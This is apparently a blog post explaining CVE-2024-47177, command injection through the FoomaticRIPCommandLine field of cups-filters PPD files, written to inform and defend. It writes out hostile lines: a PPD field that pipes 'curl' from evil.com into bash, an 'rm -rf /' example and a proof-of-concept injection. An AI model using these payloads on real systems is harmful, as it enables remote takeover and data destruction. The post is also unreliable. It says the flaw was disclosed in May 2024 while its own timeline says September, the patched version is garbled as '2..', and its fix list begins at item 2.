CVE CyberSecurity Database News

CVE-2024-47177 - How Insecure PPD File Parsing in cups-filters Can Lead to Remote Command Execution

Poster -

On May 2024, a critical vulnerability titled CVE-2024-47177 was disclosed in the popular cups-filters project. This flaw, combined with logic errors described in CVE-2024-47176, can let attackers run commands on your Linux print server—sometimes even from a remote network.

‘cups-filters’ is a widely used set of backends and filters that help CUPS (Common UNIX Printing System) work on non-Mac OS systems. CUPS itself is the backbone of most printing services on Linux. If you run any sort of Linux print server—or even just print from your desktop—this post is for you. We’ll break it all down in plain English, show you how the attack works, and provide relevant links.

What Is CVE-2024-47177?

At its core, CVE-2024-47177 is a command injection bug. This means someone can run their own commands on your server by sneaking code into something the computer expects to be safe. In this case, it all comes down to the way a print job’s PPD (PostScript Printer Description) file is handled.

A field called FoomaticRIPCommandLine in the PPD isn't properly sanitized before being used as a shell command. Because of this, an attacker-controlled PPD file can inject and execute dangerous commands with the same privileges as the CUPS system account—usually lp. If further bugs (like those in CVE-2024-47176) are chained, even remote attackers can exploit this via network print jobs.

Where’s the Issue in the Code?

In real setups, the trouble comes from lines in the foomatic-rip filter—typically found in /usr/lib/cups/filter/foomatic-rip. Here’s a simplified, relevant snippet:

# In foomatic-rip (Perl script)
my $cmdline = $ppd->{"FoomaticRIPCommandLine"};
# ...
system($cmdline);

If $ppd->{"FoomaticRIPCommandLine"} is not validated, any value there will be passed straight to your server’s shell and executed. Imagine if that’s:

lpadmin && rm -rf / --no-preserve-root

Now, the FoomaticRIPCommandLine might be set by the server admin—or by a rogue user uploading a crafted PPD. If attackers can submit their own printers, they get code execution.

How is this Exploited?

This bug is especially dangerous for print servers where regular users—or *remote* users—can add or configure printers. Here’s how a typical attack could work:

1. Craft a Malicious PPD File: The attacker creates a printer driver file (PPD) with a specially crafted FoomaticRIPCommandLine field, for example:

`ppd

*FoomaticRIPCommandLine: "|/bin/bash -c 'curl http://evil.com/shell.sh | bash'"

`

2. Upload/Install the Printer: The attacker uses a vulnerability or weak admin policy to upload their printer and assign the PPD file.

3. Trigger the Print Job: When anyone sends a file to this printer, foomatic-rip runs the malicious line as the lp user. If network access is possible, this can all happen remotely. If CVE-2024-47176 (a related logic bug) is present, just submitting a remote print job might be enough.

4. Gain a Shell/Execute a Payload: The print server fetches and runs the attacker's code, often opening a reverse shell.

Here’s a minimal proof-of-concept PPD line that triggers the bug

*FoomaticRIPCommandLine: "| id | tee /tmp/hacked_by_cve47177"

When a print job uses this printer, /tmp/hacked_by_cve47177 will contain the user and group info showing that arbitrary shell commands have run.

References

- CVE-2024-47177 on NIST
- CUPS Project
- cups-filters GitHub
- Debian Security Advisory for cups-filters (DSA 5702-1)
- Original cups-filters commit fixing the issue
- Mitre CVE Entry

Update cups-filters to the latest patched version (*2.. or newer as of June 2024*).

2. Block untrusted printer drivers and PPDs on your server—don't allow users to upload arbitrary files!

Summary

CVE-2024-47177 is a critical reminder that printer software isn’t just for offices and teachers—it’s a real attack vector for hackers. If you use Linux for printing (using CUPS and cups-filters), check your systems and patch immediately.

As always: Update, limit user access, and don’t trust anything that gets parsed into a shell command! The fate of your print jobs—and perhaps your entire server—depends on it.


Stay safe! For any questions, check the original security advisory or your distribution’s update notes.

Timeline

Published on: 09/26/2024 22:15:04 UTC
Last modified on: 09/30/2024 12:46:20 UTC